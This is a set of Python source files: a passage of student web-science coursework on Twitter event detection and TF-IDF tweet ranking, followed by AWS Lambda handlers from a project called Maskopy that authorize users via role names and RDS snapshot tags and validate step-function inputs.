categorycount = datecount[datestr]
if key in categorycount:
categorycount[key] += 1
else:
categorycount[key] = 1
datecount[datestr] = categorycount
break
datekeys = set(datecount.keys())
dinfos = []
        # For each date key, create a DateInfo object and append it
for date in datekeys:
d = datetime.strptime(date, self.dayhoursdm)
if d:
info = DateInfo()
info.d = d
info.catcounts = datecount[date]
dinfos.append(info)
# Sort in descending order of the dates
dinfos.sort(reverse=True)
        # Assign axis steps according to the number of dates and categories
result["axisxstep"] = len(dinfos) - 1
result["axisystep"] = len(self.CATEGORIES) - 1
xcoordinates = []
ycoordinates = []
axisxlabels = []
axisylabels = []
data = []
for key in catkeys:
axisylabels.append(key)
i = 0
j = 0
for date in dinfos:
strdate = date.d.strftime(self.hoursdm)
axisxlabels.append(strdate)
catcounts = date.catcounts
for key in catkeys:
xcoordinates.append(j)
ycoordinates.append(i)
i += 1
if key in catcounts:
data.append(catcounts[key])
else:
data.append(0)
i = 0
j += 1
result["xcoordinates"] = xcoordinates
result["ycoordinates"] = ycoordinates
result["axisxlabels"] = axisxlabels
result["axisylabels"] = axisylabels
result["data"] = data
return result
def get_data(result):
"""
Function to generate Event summary from the Categories given
:return:
"""
# global infile_name
ese = EventSummaryExtractor()
ese.initialize_categories()
return ese.extract_category_trends(result)
if __name__ == '__main__':
global infile_name
ese = EventSummaryExtractor()
# parser = argparse.ArgumentParser()
# parser.add_argument('-i', nargs="?", default=ese.DEF_INFILENAME,
# help='Name of the input file containing tweets')
# print(get_data(result))
textTotal = []
for x in result:
groupInfo = [x['coordinates'], x['_id'], x['username'], x['text'].lower(), x['place_name'], x['place_country'],
x['place_coordinates'], x['date']]
textTotal.append(groupInfo)
for x in textTotal:
# print(datetime.strptime(x[7], "%a %b %d %H:%M:%S Z %Y"))
timeArry = datetime.strptime(x[7], "%a %b %d %H:%M:%S +0000 %Y")
# timestamp = time.mktime(timeArry)
x[7] = datetime.timestamp(timeArry)
# print(timeArry)
print(get_data(textTotal))
# print(textTotal)
```
#### File: Jin-Tao-208/web_science_coursework/rankText.py
```python
import json
import time
import math
with open('textGrouped.json', 'r', encoding='utf-8') as f:
data = json.load(f)
cout0 = 0
cout = 0
data_set = []
mark_set = []
text_set = []
follower_set = []
age_set = []
verified_set = []
profile_set = []
avgClass = []
for i in range(0, len(data)):
groupClass = []
sumVal = 0
for j in range(0, len(data[i])):
groupCol = []
followerVal = data[i][j][5]
veridiedVal = data[i][j][6]
profileVal = data[i][j][7]
descriptionVal = data[i][j][8]
timeArry = time.strptime(data[i][j][4], "%a %b %d %H:%M:%S +0000 %Y")
ageTime = time.time() - time.mktime(timeArry)
ageVal = int(abs(ageTime)) // 24 // 3600
dayMark = 0
followerMark = 0
verifiedMark = 0
profileMark = 0
descriptionMark = 0
if ageVal < 1:
dayMark = 0.05
elif ageVal < 30:
dayMark = 0.10
elif ageVal > 90:
dayMark = 0.25
if followerVal < 50:
followerMark = 0.5
elif followerVal < 5000:
followerMark = 1.0
elif followerVal < 10000:
followerMark = 1.5
elif followerVal < 100000:
followerMark = 2.0
elif followerVal < 200000:
followerMark = 2.5
elif followerVal > 200000:
followerMark = 3.0
if veridiedVal:
verifiedMark = 1.5
else:
verifiedMark = 1.0
if profileVal:
profileMark = 0.5
else:
profileMark = 1
if descriptionVal:
descriptionMark = 1.2
else:
descriptionMark = 0.8
qualityScore = (dayMark + verifiedMark + followerMark + profileMark + descriptionMark) / 5
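        # Illustrative score: an account older than 90 days (dayMark 0.25) that is
        # verified (1.5), has 20k followers (followerMark 2.0) and has profileVal
        # and descriptionVal set (0.5 and 1.2) scores
        # (0.25 + 1.5 + 2.0 + 0.5 + 1.2) / 5 = 1.09.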
# print(ageTime)
# groupCol.append(ageTime)
groupClass.append(qualityScore)
sumVal += qualityScore
# x = computeScore(data[i][j][3], data[i][j][4], data[i][j][5], data[i][j][6])
mark_set.append(groupClass)
avgClass.append(sumVal / len(data[i]))
# print(mark_set)
for x in range(0, len(mark_set)):
for i in range(0, len(mark_set[x])):
if len(mark_set[x]) > 1:
for j in range(i + 1, len(mark_set[x])):
if mark_set[x][i] > mark_set[x][j]:
maxVal = mark_set[x][i]
mark_set[x][i] = mark_set[x][j]
mark_set[x][j] = maxVal
                    maxSet = data[x][i]
data[x][i] = data[x][j]
data[x][j] = maxSet
# print(mark_set)
for x in range(0, len(mark_set)):
for i in range(x + 1, len(mark_set)):
if avgClass[x] > avgClass[i]:
turn1 = avgClass[x]
avgClass[x] = avgClass[i]
avgClass[i] = turn1
turn2 = mark_set[x]
mark_set[x] = mark_set[i]
mark_set[i] = turn2
turn3 = data[x]
data[x] = data[i]
data[i] = turn3
# print(mark_set)
# print("---------------------")
# print(avgClass)
dataFilter = []
for x in data:
if len(x) > 10:
dataFilter.append(x)
minSize = len(dataFilter[0])
maxSize = 0
avgSize = 0
for x in dataFilter:
if len(x) < minSize:
minSize = len(x)
if len(x) > maxSize:
maxSize = len(x)
avgSize += len(x)
print("Arrange the data within and between groups in ascending order, and delete groups of less than 10 items as noise")
print("total nums group is :", len(dataFilter))
print("filtered group max Size:", maxSize)
print("filtered group min Size:", minSize)
print("filtered group average Size:", avgSize / len(dataFilter))
with open("textRanked.json", 'w', encoding="utf-8") as g1:
json.dump(dataFilter, g1, ensure_ascii=False)
def computeTF(wordDict, bow):
tfDict = {}
bowCount = len(bow)
for word, count in wordDict.items():
tfDict[word] = count / float(bowCount)
return tfDict
def computeIDF(docList):
idfDict = {}
N = len(docList)
idfDict = dict.fromkeys(docList[0].keys(), 0)
for doc in docList:
for word, val in doc.items():
if val > 0:
idfDict[word] += 1
for word, val in idfDict.items():
idfDict[word] = math.log10(N / float(val))
return idfDict
def computeTFIDF(tfBow, idfs, cId):
tfidf = []
for word, val in tfBow.items():
tfidfInfo = []
tfidfInfo.append(word)
tfidfInfo.append([val * idfs[word]])
tfidf.append(tfidfInfo)
return tfidf
print("For valuable information, select the top 5 TF-IDF words in each group")
for group1 in dataFilter:
wordSet = []
wordSet1 = []
print(group1)
group = group1[0:10]
for tweetContent in group:
wordSet = list(set(wordSet).union(set(tweetContent[1])))
for i in range(0, len(group)):
wordSet1.append(dict.fromkeys(wordSet, 0))
for sentence in range(0, len(group)):
for word in group[sentence][1]:
wordSet1[sentence][word] += 1
tfresult = []
for x in range(0, len(group)):
x = computeTF(wordSet1[x], group[x][1])
tfresult.append(x)
idfresult = computeIDF(wordSet1)
tfidfResult = []
worthResult = []
for x in range(0, len(group)):
worthGroup = computeTFIDF(tfresult[x], idfresult, x)
worthGroupInfo = []
for i in range(0, len(worthGroup)):
if worthGroup[i][1][0] != 0:
columGroup = []
columGroup.append(worthGroup[i][0])
columGroup.append(worthGroup[i][1])
worthGroupInfo.append(columGroup)
worthResult.append(worthGroupInfo)
groupKey = []
for x in worthResult:
groupKeyInfo = []
count10 = 0
for i in x:
            if len(i) > 0 and count10 < 3:
groupKeyInfo.append(i[0])
groupKeyInfo.append(i[1])
count10 += 1
groupKey.append(groupKeyInfo)
try:
groupKey.sort(key=lambda sublist: sublist[0][1], reverse=True)
resultTop = groupKey[0:5]
for x in resultTop:
print(x[0])
except Exception as e:
pass
```
#### File: Jin-Tao-208/web_science_coursework/TwitterEventDetector.py
```python
from collections import OrderedDict
import json
from math import exp
import os
from BurstySegmentExtractor import BurstySegmentExtractor
from Segment import Segment
from TimeWindow import SubWindow
from TweetSegmenter import SEDTWikSegmenter
from utils.pyTweetCleaner import TweetCleaner
class TwitterEventDetector():
def __init__(self, wiki_titles_file, seg_prob_file, wiki_Qs_file, remove_retweets=False, max_segment_length=4,
hashtag_wt=3,
use_retweet_count=True, use_followers_count=True, default_seg_prob=0.000001, entities_only=False):
self.segmenter = SEDTWikSegmenter(wiki_titles_file, max_segment_length, hashtag_wt, entities_only)
self.remove_retweets = remove_retweets
self.bse = BurstySegmentExtractor(seg_prob_file, use_retweet_count, use_followers_count, default_seg_prob)
# prob that a segment is anchor text in all pages containing that segment
with open(wiki_Qs_file, 'r') as f:
self.wiki_prob = json.load(f)
def clean_tweets_in_directory(self, root_dir, target_dir):
"""
clean tweets in root_dir using pyTweetCleaner and save cleaned files in target_dir
This need to be done just once and then the cleaned tweets can be used afterward
"""
print('Cleaning all tweets in given directory')
tc = TweetCleaner(True, self.remove_retweets)
if not os.path.isdir(target_dir): os.mkdir(target_dir)
for dir_path, _, file_list in os.walk(root_dir):
dir_path = dir_path.replace('\\',
'/') # make windows-like path to unix-like path which can be used for both
dir_name = dir_path.replace(root_dir, '')
print('Found directory: %s' % dir_name)
target_file_path = target_dir + '/' + dir_name
if not os.path.isdir(target_file_path): os.mkdir(target_file_path)
for fname in file_list:
print(fname)
tc.clean_tweets(input_file=dir_path + '/' + fname, output_file=target_file_path + '/' + fname)
print('Cleaned all tweets and saved to', target_dir)
def read_subwindow(self, file_path):
"""
read a SubWindow from a file
all tweets in given file belong to the subwindow
"""
segments = {}
tweet_count = 0
f = open(file_path, 'rb')
for line in f:
line = line.decode().replace('\n', '')
if line == '': continue
json_tweet = json.loads(line)
# json_tweet = line
tweet_count += 1
user_id = json_tweet['user']['id']
retweet_count = json_tweet['retweet_count']
followers_count = json_tweet['user']['followers_count']
segmentation = self.segmenter.tweet_segmentation(json_tweet)
tweet_text = ' '.join(list(OrderedDict.fromkeys(
segmentation))) # because of hashtag_wt, some segments might be multiple in tweet text after joining so remove them
tweet_text = ''.join([c for c in tweet_text if ord(
c) < 256]) # dont know why but some non ascii chars like \u0441='c'still survived segmentation!!!
for seg in segmentation:
if not seg in segments:
new_seg = Segment(seg)
new_seg.newsworthiness = self.get_segment_newsworthiness(seg)
segments[seg] = new_seg
segments[seg].add_tweet(user_id, tweet_text, retweet_count, followers_count)
f.close()
sw = SubWindow(segments, tweet_count)
return sw
def get_segment_newsworthiness(self, seg):
"""
return max exp(Q(l))-1 from all sub phrases 'l' in seg(string)
"""
seg = seg.split(' ')
n = len(seg)
# max_sub_phrase_prob = max([self.get_wiki_Qs_prob(seg[i:i+j+1]) for i in range(n) for j in range(n-i)])
# return exp(max_sub_phrase_prob)-1
if n == 1:
return exp(self.get_wiki_Qs_prob(seg))
else:
max_sub_phrase_prob = max([self.get_wiki_Qs_prob(seg[i:i + j + 1]) for i in range(n) for j in range(n - i)])
return exp(max_sub_phrase_prob) - 1
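    # Illustrative example: for a multi-word segment whose best sub-phrase has an
    # anchor-text probability of 0.6 in the wiki_Qs_file statistics, the score is
    # exp(0.6) - 1 ~= 0.82; a phrase that never appears as anchor text scores
    # exp(0) - 1 = 0.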
def get_wiki_Qs_prob(self, seg):
"""
return prob that seg(list of words) is an anchor text from all pages containing seg
"""
return self.wiki_prob.get(' '.join(seg), 0)
``` |
{
"source": "JintaoH/maskopy",
"score": 2
} |
#### File: lambda/00-AuthorizeUser/index.py
```python
import json
import os
import re
import boto3
import requests
from botocore.exceptions import ClientError
STS_CLIENT = boto3.client("sts")
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the zeroth lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Raises:
MaskopyAccessException: Raise exception if IAM role or user does not have access
to resource.
"""
if not event['ApplicationName']:
raise Exception(
"Input 'ApplicationName' is missing. Please check your step function inputs."
)
# Create and assume a session in the source account.
assume_role_session = create_account_session(
STS_CLIENT,
ASSUME_ROLE_ARN,
context.aws_request_id
)
# Create an RDS client to source account.
rds_client = assume_role_session.client('rds')
application_name = event['ApplicationName']
if event.get('RdsSnapshotIdentifier') != "":
engine=get_engine(event.get('RdsSnapshotIdentifier'),rds_client)
snapshot_identifier = event.get('RdsSnapshotIdentifier')
else:
engine=get_instance_engine(event.get('RdsInstanceIdentifier'),rds_client)
rds_identifier = event['RdsInstanceIdentifier']
url = event["PresignedUrl"]
# Get tags from RDS snapshot. This is used to check user authorization.
if event['RdsSnapshotIdentifier']:
try:
tags = get_snapshot_tags(rds_client, snapshot_identifier,engine['Type'])
snapshot_ags = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"].upper()
except:
raise MaskopyAccessException("Snapshot (" + snapshot_identifier + ") does not have ApplicationName tag.")
elif event['RdsInstanceIdentifier']:
try:
tags = get_db_tags(rds_client, rds_identifier,engine['Type'])
print(f"RDS Tags are {tags}.")
snapshot_ags = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"].upper()
print(f"RDS Snapshot Tags are {snapshot_ags}.")
except MaskopyResourceNotFoundException as err:
            raise MaskopyResourceNotFoundException(err)
except:
raise MaskopyAccessException("RDS (" + rds_identifier + ") does not have a instance with correct ApplicationName tag.")
else:
raise MaskopyAccessException("No snapshot or rds provided")
# Get role from presigned url. This is used to authenticate the user.
role = get_role_from_presigned_url(url)
print(f"Running Maskopy with role: {role}.")
try:
snapshot_application_name = next(tag for tag in tags if tag["Key"] == "ApplicationName")["Value"]
except:
raise MaskopyAccessException(
f"Snapshot({snapshot_identifier}) does not have 'ApplicationName' tag."
)
# Verify if the role contains the application name and
# if the role contains the snapshot tag.
if application_name.lower() not in role.lower():
raise MaskopyAccessException(
f"User role ({role}) does not match ApplicationName input: {application_name}")
if snapshot_application_name.lower() not in role.lower():
raise MaskopyAccessException(
f"User role ({role}) is not authorized to access this snapshot: "
f"{snapshot_application_name}")
print("User successfully authorized!")
return engine
def get_engine(snapshot_identifier, rds_client):
"""Function to retrieve engine version (RDS or Aurora)
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
Returns:
:obj:`dict` of :obj:`str`: Returns the engine response from rds_client for the snapshot
Raises:
        MaskopyThrottlingException: Exception used to catch throttling from AWS.
            Used to implement a back off strategy.
        MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
print(f'Checking snapshot engine with the following name: {snapshot_identifier}')
snapshot_response= rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
snapshot_return= {
'Type':snapshot_response['DBSnapshots'][0]['Engine'],
'Version': snapshot_response['DBSnapshots'][0]['EngineVersion']
}
return snapshot_return
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
elif err.response['Error']['Code']=='DBSnapshotNotFound':
try:
#CLUSTER SNAPSHOT METHOD
snapshot_response= rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
snapshot_return= {
'Type':snapshot_response['DBClusterSnapshots'][0]['Engine'],
'Version': snapshot_response['DBClusterSnapshots'][0]['EngineVersion']
}
return snapshot_return
except ClientError as err:
print(f"Failed to get RDS type for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
print(f'There was a problem checking the DB snapshot engine: {err}')
raise
def get_instance_engine(rds_identifier, rds_client):
"""Function to retrieve engine version (RDS or Aurora)
Args:
rds_client (Client): AWS RDS Client object.
rds_identifier (str): The RDS instance identifier
Returns:
:obj:`dict` of :obj:`str`: Returns the engine response from rds_client for the instance
Raises:
        MaskopyThrottlingException: Exception used to catch throttling from AWS.
            Used to implement a back off strategy.
        MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
print(f'Checking instance engine with the following name: {rds_identifier}')
instance_response= rds_client.describe_db_instances(
DBInstanceIdentifier=rds_identifier)
instance_return= {
'Type':instance_response['DBInstances'][0]['Engine'],
'Version': instance_response['DBInstances'][0]['EngineVersion']
}
return instance_return
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
elif err.response['Error']['Code']=='DBInstanceNotFound':
try:
#CLUSTER SNAPSHOT METHOD
instance_response= rds_client.describe_db_clusters(
DBClusterIdentifier=rds_identifier)
instance_return= {
'Type':instance_response['DBClusters'][0]['Engine'],
'Version': instance_response['DBClusters'][0]['EngineVersion']
}
return instance_return
except ClientError as err:
print(f"Failed to get RDS type for {rds_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
print(f'There was a problem checking the DB snapshot engine: {err}')
raise
def get_role_from_presigned_url(url):
"""Function to retrieve role from presigned url.
Args:
url (str): Presigned url to request the role.
Raises:
MaskopyHTTPException: Raise exception if HTTP client POST request fails,
or for any other general HTTP exception.
MaskopyTimeoutException: Raise exception if HTTP client POST request times out.
"""
# POST Request to url. Raise HTTP related exceptions as needed.
try:
request = requests.post(url, headers={'Accept': 'application/json'})
request.raise_for_status()
except requests.exceptions.HTTPError as err:
raise MaskopyHTTPException(err)
except requests.exceptions.Timeout:
raise MaskopyTimeoutException("Request timed out.")
except requests.exceptions.RequestException as err:
raise MaskopyHTTPException(err)
# Get the name of the role from the predefined url.
data = json.loads(request.text)
arn = data['GetCallerIdentityResponse']['GetCallerIdentityResult']['Arn']
return arn.split('/')[1]
def get_snapshot_tags(rds_client, snapshot_identifier, engine):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
engine (str): Engine type
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
if 'aurora' in engine:
return get_snapshot_tags_cluster(rds_client, snapshot_identifier)
else:
return get_snapshot_tags_instance(rds_client, snapshot_identifier)
def get_snapshot_tags_instance(rds_client, snapshot_identifier):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS snapshot identifier
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
# INSTANCE SNAPSHOT METHODS
describe_db_response = rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
snapshot_arn = describe_db_response['DBSnapshots'][0]['DBSnapshotArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=snapshot_arn)
return list_tags_response['TagList']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get RDS tags for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
def get_snapshot_tags_cluster(rds_client, snapshot_identifier):
"""Function to retrieve list of tags from snapshot_identifier
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The RDS cluster snapshot identifier
Returns:
:obj:`list` of :obj:`str`: The list of tags associated with snapshot,
None otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
MaskopyResourceNotFoundException: Exception raised if resource does not exist.
"""
try:
#CLUSTER SNAPSHOT METHOD
describe_db_response = rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
snapshot_arn = describe_db_response['DBClusterSnapshots'][0]['DBClusterSnapshotArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=snapshot_arn)
return list_tags_response['TagList']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get Cluster RDS tags for {snapshot_identifier}: {err}")
raise MaskopyResourceNotFoundException(err)
def get_db_tags(rds_client, rds_identifier, engine):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
if 'aurora' in engine:
return get_db_tags_cluster(rds_client, rds_identifier)
else:
return get_db_tags_instance(rds_client, rds_identifier)
def get_db_tags_instance(rds_client, rds_identifier):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
try:
describe_db_response = rds_client.describe_db_instances(
DBInstanceIdentifier=rds_identifier
)
rds_arn = describe_db_response['DBInstances'][0]['DBInstanceArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=rds_arn
)
return list_tags_response['TagList']
except ClientError as err:
        raise MaskopyResourceNotFoundException(err)
def get_db_tags_cluster(rds_client, rds_identifier):
"""Return list of tags associated with source DB. Return false DB doesn't exist."""
try:
describe_db_response = rds_client.describe_db_clusters(
DBClusterIdentifier=rds_identifier
)
rds_arn = describe_db_response['DBClusters'][0]['DBClusterArn']
list_tags_response = rds_client.list_tags_for_resource(
ResourceName=rds_arn
)
return list_tags_response['TagList']
except ClientError as err:
raise MaskopyResourceNotFoundException(err)
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
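# Minimal usage sketch (the request id below is a placeholder, not a value from this repository):
#   session = create_account_session(STS_CLIENT, ASSUME_ROLE_ARN, "example-request-id")
#   source_rds_client = session.client('rds')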
class MaskopyAccessException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource due to authorization error.
"""
class MaskopyResourceNotFoundException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource since the resource does not exist.
"""
class MaskopyHTTPException(Exception):
"""Exception raised when HTTP request returns a 4xx or 5xx error.
"""
class MaskopyTimeoutException(Exception):
"""Exception raised when HTTP request times out.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
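For reference, here is a minimal sketch of the payload that `get_role_from_presigned_url` parses. The account id and role name below are invented; only the key structure is taken from the code above.

```python
import json

# Hypothetical response body returned by POSTing the presigned GetCallerIdentity URL.
body = json.dumps({
    "GetCallerIdentityResponse": {
        "GetCallerIdentityResult": {
            "Arn": "arn:aws:sts::123456789012:assumed-role/myapp-deploy-role/session-name"
        }
    }
})

data = json.loads(body)
arn = data['GetCallerIdentityResponse']['GetCallerIdentityResult']['Arn']
# Splitting on '/' yields ['arn:aws:sts::123456789012:assumed-role',
# 'myapp-deploy-role', 'session-name'], so index 1 is the role name used
# for the authorization checks.
print(arn.split('/')[1])  # -> myapp-deploy-role
```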
#### File: lambda/01-CheckInputs/index.py
```python
import os
import json
import re
import boto3
from botocore.exceptions import ClientError
STS_CLIENT = boto3.client("sts")
CUSTOM_KMS_KEY = os.environ['custom_kms_key']
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the first lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
:obj:`dict` of str:str: Return dict with details of snapshot that was created.
Raises:
MaskopyResourceNotFoundException: Raised if inputs are not valid.
Exception: Generic exception raised
if final snapshot name already exists in destination.
"""
rds_client_local = boto3.client("rds")
assume_role_session = create_account_session(
STS_CLIENT,
ASSUME_ROLE_ARN,
context.aws_request_id)
rds_client = assume_role_session.client('rds')
# Check if inputs are valid and have valid resources.
try:
check_inputs(event)
check_valid_resources(rds_client_local, rds_client, event)
print("All input values verified")
except MaskopyResourceNotFoundException:
print("One or more of required inputs are missing/invalid. Please check your inputs.")
raise
return {"firstSnapshotIdentifier": event.get("RdsSnapshotIdentifier")}
def check_inputs(step_event):
"""Function to check and validation inputs in step_event dictionary.
This function does not return anything, but raises MaskopyResourceNotFoundException
if inputs do not exist or are invalid.
Args:
step_event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
Raises:
MaskopyResourceNotFoundException: Raised if input is not found or is empty.
"""
print("Checking step function inputs...")
# Loop through keys and check if they are not None or empty values in the step_event
keys = ['ApplicationName', 'CostCenter', 'DestinationEnv']
for key in keys:
if not step_event.get(key):
raise MaskopyResourceNotFoundException(
f'{key} is missing. Please check your step function inputs.')
    if 'RdsSnapshotIdentifier' not in step_event and 'RdsInstanceIdentifier' not in step_event:
        raise MaskopyResourceNotFoundException(
            'Both RdsSnapshotIdentifier and RdsInstanceIdentifier are missing. '
            'Please provide at least one in your step function inputs.')
# Check if RdsFinalSnapshotIdentifier is provided and
# if so check if it starts with ApplicationName
if (step_event.get("RdsFinalSnapshotIdentifier") and
not step_event['RdsFinalSnapshotIdentifier'].startswith(
step_event['ApplicationName'].lower())):
raise MaskopyResourceNotFoundException(
"Given final snapshot name is not valid, must start with lowercase ApplicationName.")
# Check for obfuscation run mode choices: ecs, fargate, and none.
# The default run mode is fargate.
print("ObfuscateRunMode set to fargate.")
if not step_event.get('ObfuscationScriptPath'):
raise MaskopyResourceNotFoundException(
"ObfuscationScriptPath is missing. Please check your step function inputs.")
def check_valid_resources(rds_client_local, rds_client, step_event):
"""Function to check and validation inputs in step_event dictionary.
This function does not return anything, but raises MaskopyResourceNotFoundException
if inputs do not exist or are invalid.
Args:
rds_client_local (Client): AWS RDS Client object with a local session.
rds_client (Client): AWS RDS Client object with a source account session.
step_event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
Raises:
MaskopyResourceNotFoundException: Raised if input is not found or is empty.
"""
    engine = step_event['Engine']['Type']
    # Resolve the snapshot identifier first: if it was not provided, derive it from
    # the latest available snapshot of the given RDS instance.
    if not step_event.get('RdsSnapshotIdentifier'):
        if not step_event.get('RdsInstanceIdentifier'):
            raise Exception("RdsSnapshotIdentifier is missing. Please check your step function inputs.")
        step_event['RdsSnapshotIdentifier'] = get_snapshot_from_rds(
            rds_client, step_event.get('RdsInstanceIdentifier'), engine)
    # Check if the resolved RdsSnapshotIdentifier exists in the source account.
    # Throw an exception if not found, since we need to copy this snapshot.
    snapshot_response = check_snapshot_exists(rds_client, step_event['RdsSnapshotIdentifier'], engine)
    if not snapshot_response:
        raise MaskopyResourceNotFoundException(
            f"{step_event['RdsSnapshotIdentifier']} does not exist in source account.")
    # Check if provided RdsFinalSnapshotIdentifier already exists in destination environment.
    # If not provided, ignore.
    if (step_event.get('RdsFinalSnapshotIdentifier') and
            check_snapshot_exists(rds_client_local, step_event['RdsFinalSnapshotIdentifier'], engine)):
        raise MaskopyResourceNotFoundException("Final snapshot name already exists.")
# Check if the input, RdsParameterGroup, is a valid parameter group.
if step_event.get('RdsParameterGroup'):
check_valid_parameter_group(rds_client_local, step_event['RdsParameterGroup'],engine)
# If the DB engine is oracle, check if the input, RdsOptionGroup, is a valid option group.
if "oracle" in engine:
if not step_event.get('RdsOptionGroup'):
raise MaskopyResourceNotFoundException(
"RdsOptionGroup is missing. "
"It is required if your DBEngine is Oracle based. "
"Please check your step function inputs.")
# Check if the input, RdsOptionGroup, is a valid option group.
check_valid_option_group(rds_client_local, step_event['RdsOptionGroup'])
if "postgres" in engine:
if not step_event.get('SqlScriptList'):
raise MaskopyResourceNotFoundException(
"SqlScriptList is missing. "
"It is required if your DBEngine is Postgres based. "
"Please check your step function inputs.")
if not step_event.get('DbName'):
raise MaskopyResourceNotFoundException(
"DbName is missing. "
"It is required if your DBEngine is Postgres based. "
"Please check your step function inputs.")
# fargate mode checks if ObfuscationScriptPath has a bootstrap script.
print("Setting obfuscation mode to fargate. Checking resources.")
try:
check_if_script_path_exists(step_event.get('ObfuscationScriptPath'), engine, step_event.get('SqlScriptList'))
except MaskopyResourceNotFoundException:
print(f"Bootstrap script was not found in {step_event.get('ObfuscationScriptPath')}.")
raise
def check_snapshot_exists(rds_client, snapshot_identifier, rds_type):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if "aurora" in rds_type:
return check_snapshot_exists_cluster(rds_client, snapshot_identifier)
else:
return check_snapshot_exists_instance(rds_client, snapshot_identifier)
def check_snapshot_exists_cluster(rds_client, snapshot_identifier):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')
snapshot_response = rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
return snapshot_response
    except rds_client.exceptions.DBClusterSnapshotNotFoundFault:
        return False
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
        print(f'There was a problem checking the DB cluster snapshot: {err}')
        # Treat any other describe failure as "snapshot not found" so the caller can report it.
        return False
def check_snapshot_exists_instance(rds_client, snapshot_identifier):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Checking DB snapshot with the following name: {snapshot_identifier}')
snapshot_response = rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
return snapshot_response
except rds_client.exceptions.DBSnapshotNotFoundFault as err:
return False
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the DB snapshot: {err}')
raise
